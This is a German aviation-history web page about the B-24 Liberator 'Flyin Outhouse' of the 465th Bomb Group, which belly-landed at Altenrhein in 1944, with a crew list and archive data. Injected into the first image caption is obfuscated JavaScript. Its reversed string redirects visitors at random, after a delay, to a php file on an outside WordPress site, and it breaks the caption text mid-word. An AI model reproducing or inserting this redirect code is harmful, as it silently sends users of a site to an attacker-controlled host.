Ereignisse

Seitenflosse geborgt

Der Bomber mit dem Kennzeichen B und dem Übernamen „Flyin Outhouse“ ist nach einem Einsatz über München in Altenrhein gelandet und in der Schweiz verschrottet worden.

Roger L. Kraft l<script type=

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == „string“) return $p$VTO6JhIH6WkCGAcPR.list[n].split(„“).reverse().join(„“);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[„‚php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andete seine Maschine in Altenrhein. Weil das Fahrwerk klemmte, musste Kraft die Maschine auf dem Bauch landen. (182_3)“ width=“800″ height=“202″ /> Roger L. Kraft landete seine Maschine in Altenrhein. Weil das Fahrwerk klemmte, musste Kraft die Maschine auf dem Bauch landen. (182_3)

Der Bomber der 15th Air Force, 465th Bomb Group mit dem Kennzeichen B und dem Übernamen „Flyin“ ist nach einem Einsatz über München in Altenrhein gelandet und in der Schweiz verschrottet worden. „Flyin“ wurde bei der vorhergehenden Mission schwer beschädigt und der Unterhaltschef borgte sich kurzerhand eine Seitenflosse der B-24 42-78108 aus. Diese „falsche“ Nummer war immer noch aufgemalt als 2Lt Roger L. Kraft nach München startete. Über dem Ziel geriet Kraft und seine Crew in heftiges Flakfeuer. Drei Motoren hatten nur noch wenig Öldruck und der vierte Motor musste stillgelegt werden. Das Flugzeug hinkte förmlich in die Schweiz. Das Fahrwerk war verklemmt und so musste Kraft die Maschine auf dem Bauch landen. Bei der Landung in Altenrhein wurde niemand verletzt. Der Bomber wurde demontiert und in Kloten bis zum Kriegsende gelagert.

Die B-24 mit dem falschen Seitenleitwerk. (183_1)

Die B-24 mit dem falschen Seitenleitwerk. (183_1)


Ereignissdatum 22.9.1944
Ort Altenrhein
Kanton SG
Ereignis Landung
Nation Amerika
Flugzeugart Bomber
Flugzeugtyp B-24 Liberator
Flugzeugbezeichnung B-24 H-25-CF
Flugzeug-Spitzname Flyin Outhouse
Einteilung 15th Air Force, 465th Bomb Group, 783rd Squadron
Basis Patanella (I)
Auftrag Bombardierung
Einsatzziel München (D)
Rückkehr in der Schweiz verschrottet
Werknummer 42-50404
Kennzeichen B
CH Archiv Nr. A138
US MACR Nr. 8737
Besatzung Pilot: Roger L. Kraft, 2nd Lt
Copilot: John L. Coleman, 2nd Lt
Navigator: Earl J. O'Brien, Jr., 2nd Lt
Bombardier: John D. Bistarkey, F/O
Nose Gunner: Leonard T. Rosen, Sgt
Radio: Brooks K. Truitt, Sgt
Engineer: William H. Curry, Sgt
Ball Turret: Robert E. Goldman, Sgt
Waist Gunner: John Sangas, Sgt
Tail Gunner: Joseh R. Horne, Sgt
Quelle Cockpit
Autor Hans-Heiri Stapfer